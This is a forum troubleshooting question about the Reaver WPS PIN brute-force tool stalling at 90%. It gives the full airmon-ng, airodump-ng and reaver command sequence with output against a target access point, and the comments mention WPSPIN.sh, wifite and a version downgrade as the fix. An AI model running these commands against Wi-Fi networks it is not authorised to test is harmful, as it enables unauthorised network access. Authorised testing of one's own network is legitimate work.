# reaver stucks at 90

Tags: networking, wireless

Directly starts on 90% whatever I do….if I let it continue it will stuck on that forever with fix pin, if variable option is given it will stuck at 99%. I had previously successfully used the same method.

*what is going wrong now?*

```
sudo systemctl stop NetworkManager.service
sudo ifconfig wlan1 down
sudo ifconfig wlan0 down
```

`sudo airmon-ng` output:

```
Interface   Chipset     Driver

wlan0       Broadcom    wl - [phy0]
wlan1       Realtek RTL8187L    rtl8187 - [phy5]
```

`sudo airmon-ng start wlan1` output:

```
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
750 avahi-daemon
818 avahi-daemon
1168    wpa_supplicant


Interface   Chipset     Driver

wlan0       Broadcom    wl - [phy0]
wlan1       Realtek RTL8187L    rtl8187 - [phy5]
                (monitor mode enabled on mon0)
```

`sudo airodump-ng mon0` output:

```
CH 14 ][ Elapsed: 4 s ][ 2015-06-02 11:50                                         

 BSSID          PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:18:25:12:DA:C5   -1      0   0    0  -1  -1         <length:  0>                                                                                FF:AA:CC:KK:EE:A4  -69      8   0    0  11  54e  WPA2 CCMP   PSK  Plz_hack_me
```

`sudo reaver -i mon0 -b  FF:AA:CC:KK:EE:A4 -v -p 15540713 -c 11` output:

```
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from FF:AA:CC:KK:EE:A4
[+] Associated with FF:AA:CC:KK:EE:A4 (ESSID: Plz_hack_me  )
[+] Trying pin 15540713
[+] Trying pin 15540713
[+] Trying pin 15540713
[+] Trying pin 15540713
[+] Trying pin 15540713
[+] Trying pin 15540713
[+] 90.96% complete @ 2015-06-02 11:54:46 (2 seconds/pin)
[+] Trying pin 15540713
[+] Trying pin 15540713
```

`sudo reaver -i mon0 -b  FF:AA:CC:KK:EE:A4 -v`:

```
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from FF:AA:CC:KK:EE:A4
[+] Associated with FF:AA:CC:KK:EE:A4 (ESSID: Plz_hack_me )
[+] Trying pin 12345670
[+] Trying pin 12340002
[+] Trying pin 12342228
[+] Trying pin 12343331
[+] Trying pin 12344444
[+] Trying pin 12344444
[+] 90.95% complete @ 2015-06-02 11:58:49 (2 seconds/pin)
[+] Trying pin 12345557
[+] Trying pin 12346660
[+] Trying pin 12347773
[+] Trying pin 12347773
[+] Trying pin 12348886
[+] 90.99% complete @ 2015-06-02 11:59:00 (2 seconds/pin)
[+] Trying pin 12349999
[+] Trying pin 12340019
```

Comment: Did you try with WPSPIN.sh 1.5? It will make things easier.

Comment: sorry same problem with WPSPIN.sh, wifite.py, or simply reaver itself...starts directly at 90%

Comment: got the problem solved with reaver 1.3